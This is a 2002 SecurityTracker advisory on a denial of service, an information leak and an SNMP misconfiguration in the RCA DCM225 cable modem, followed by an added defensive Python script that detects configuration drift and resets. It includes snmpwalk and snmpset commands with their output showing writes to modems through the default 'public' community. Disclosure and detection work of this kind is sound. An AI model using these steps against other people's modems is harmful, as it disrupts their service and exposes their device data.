SecurityTracker.com
Category:  Device (Router/Bridge/Hub)  >  RCA Cable Modem
Vendors:  RCA
RCA Cable Modem Denial of Service Error Lets Remote Users Reset the Device
Date:  Mar 27 2002
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): DCM225, Possibly Others
Description:  A denial of service vulnerability was reported in the RCA DCM225 cable modem. A remote user can cause the modem to reset user connections.

A remote user can reportedly connect to port 80 on the device using the device's 10.x.x.x IP address to cause the modem to reset. It is reported that a remote user can access this port on other users' modems in the same cable node.

Impact:  A remote user can cause the modem to reset. Doing this repeatedly can create a denial of service condition.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.rca.com/
Cause:  Not specified
Reported By:  "Gabriel A. Maggiotti" <gmaggiot@ciudad.com.ar>
Message History:   None.


 Source Message Contents

Date:  Tue, 26 Mar 2002 22:29:41 -0300
From:  "Gabriel A. Maggiotti" <gmaggiot@ciudad.com.ar>
Subject:  RCA cable modem Deny of Service

 

------------------------------------------------------------------------------
Web:  http://qb0x.net      			Author: Gabriel A. Maggiotti
Date: March 26, 2002       	        	E-mail: gmaggiot@ciudad.com.ar
------------------------------------------------------------------------------




General Info
------------
Problem Type    :  denial of service, misconfiguration and leak of information
Vendor          :  www.rca.com
Product         :  RCA cablemodems
Model           :  DCM225 (perhaps others)
Scope           :  Remote
Risk            :  High


Summary:
-------

The RCA Digital Cable Modem serves as a two-way high-speed bridge between your
personal computer and a cable Internet Service Provider (ISP). It converts
information that originates from the Internet or your computer into electronic
messages that can be transported over the same wires your cable company uses to
transport video signals.


Problem:
-------

1-  Denial of Service:

        The RCA cable modem has two devices. The one for local connection is
192.168.100.1; this device is used to request information about the status of
the cable. The other device is 10.x.x.x and gives the same information.
        If you connect to the second device (10.x.x.x) on port 80, the RCA cable
modem resets the user's connection to the Internet. I proved it with my own WAN
IP 10.1.1.x and with other cable modem users' IPs in the same WAN. All of them
reset when I remotely connect to port 80 of the cable modems.



2-  Leak of Information:
     I can connect to the WAN IP 10.x.x.x of any cable modem user in my node,
and take a look at the user's cable modem status information such as:

        USB: Inactive
        Ethernet: 100 BaseT
        MAC Address:  00 10 95 0a 05 62
        User: Active
        Signal Acquired at 573 MHz
        SNR: 36.0 dB
        Received Signal Strength: -4.0 dBmV
        Micro-Reflections: 20 dBc
        Connection: Acquired
        Frequency: 37 MHz
        Power Level: 44.0 dBmV
        Channel ID: 4
        Number of user conected: 1



I can dump the user's cable modem MIBs too.

        I can search in the MIB table looking for my node server. I know that the
node IP starts with 10.x.x.x and I started to search in the MIB. Oops, I found
it!

69.1.4.2.0 = IpAddress: 10.20.250.1
69.1.4.3.0 = IpAddress: 10.20.250.1
69.1.4.4.0 = IpAddress: 10.20.250.1
69.1.4.5.0 = "docsis_light_avalos"

        And then I recognized the word "avalos" because it is the name of the
street where the node physically is.


3-  Misconfiguration, because you can write your own MIB table. Take a look:

<quote>
[gabi@pluto gabi]$ snmpwalk 192.168.100.1 public

system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS
2.5.0
system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
system.sysUpTime.0 = Timeticks: (141857) 0:23:38.57
system.sysContact.0 = unassigned sysContact
system.sysName.0 =
system.sysLocation.0 =
system.sysServices.0 = 79

[gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysName.0 s lame
system.sysName.0 = lame

[gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysLocation.0 s lame_cyty
system.sysName.0 = lame_city


[gabi@pluto gabi]$ snmpwalk 192.168.100.1 public

system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS
2.5.0
system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
system.sysUpTime.0 = Timeticks: (161396) 0:26:53.96
system.sysContact.0 = unassigned sysContact
system.sysName.0 = lame
system.sysLocation.0 = lame_city
system.sysServices.0 = 79
</quote>


------------------------------------------------------------------------------
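
An added example, not part of the original advisory or of any vendor tooling: a defender-side check that compares two snmpwalk captures in the output format shown above, reports objects that changed (such as the sysName/sysLocation writes), and reads sysUpTime so that a drop between polls can be flagged as a modem reset. The sample captures are constructed and the function names are hypothetical.

```python
import re

# Constructed sample captures in the snmpwalk output format shown in the
# advisory (placeholder serial number; the long sysDescr line wraps as it does there).
BEFORE = """\
system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 0000000000,
HW_Version 025 (03.1), SW_Version ST05.14.00
system.sysUpTime.0 = Timeticks: (141857) 0:23:38.57
system.sysContact.0 = unassigned sysContact
system.sysName.0 =
system.sysLocation.0 =
"""
AFTER = """\
system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 0000000000,
HW_Version 025 (03.1), SW_Version ST05.14.00
system.sysUpTime.0 = Timeticks: (161396) 0:26:53.96
system.sysContact.0 = unassigned sysContact
system.sysName.0 = lame
system.sysLocation.0 = lame_city
"""

VOLATILE = {"system.sysUpTime.0"}   # changes on every poll; not a finding
LINE = re.compile(r"^([A-Za-z0-9_.\-]+) =\s?(.*)$")

def parse_walk(text):
    """Map object name -> value, folding wrapped continuation lines into the previous value."""
    table, last = {}, None
    for raw in text.splitlines():
        m = LINE.match(raw)
        if m:
            last = m.group(1)
            table[last] = m.group(2).strip()
        elif raw.strip() and last is not None:
            table[last] += " " + raw.strip()
    return table

def config_drift(before, after):
    """Return sorted (object, old, new) for objects added, removed or changed between walks."""
    b, a = parse_walk(before), parse_walk(after)
    return sorted((oid, b.get(oid), a.get(oid))
                  for oid in (b.keys() | a.keys()) - VOLATILE
                  if b.get(oid) != a.get(oid))

def uptime_ticks(text):
    """sysUpTime in hundredths of a second; a value lower than the previous poll means a reset."""
    m = re.search(r"\((\d+)\)", parse_walk(text).get("system.sysUpTime.0", ""))
    return int(m.group(1)) if m else None

if __name__ == "__main__":
    for oid, old, new in config_drift(BEFORE, AFTER):
        print(f"CHANGED {oid}: {old!r} -> {new!r}")
```
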


Copyright 2002, SecurityGlobal.net LLC